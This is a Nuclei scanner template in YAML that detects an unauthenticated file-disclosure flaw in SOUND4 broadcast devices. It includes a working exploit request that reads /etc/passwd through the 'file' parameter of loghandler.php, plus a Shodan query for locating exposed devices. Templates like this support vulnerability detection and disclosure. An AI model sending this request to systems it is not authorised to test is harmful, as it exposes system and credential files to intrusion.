34 lines
1.2 KiB
YAML
34 lines
1.2 KiB
YAML
id: sound4-file-disclosure
|
|
|
|
info:
|
|
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"SOUND4"
|
|
tags: packetstorm,lfi,sound4,unauth,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100aaecc92b917e62040941e386c4512db7ce6f63abe572507958c46788ffdcf7760221008ff8df032e8cbd8512736e2bca47ef43f12d738c8a2eb1058756c3c3106e5dec:922c64590222798bb761d5b6d8e72950
|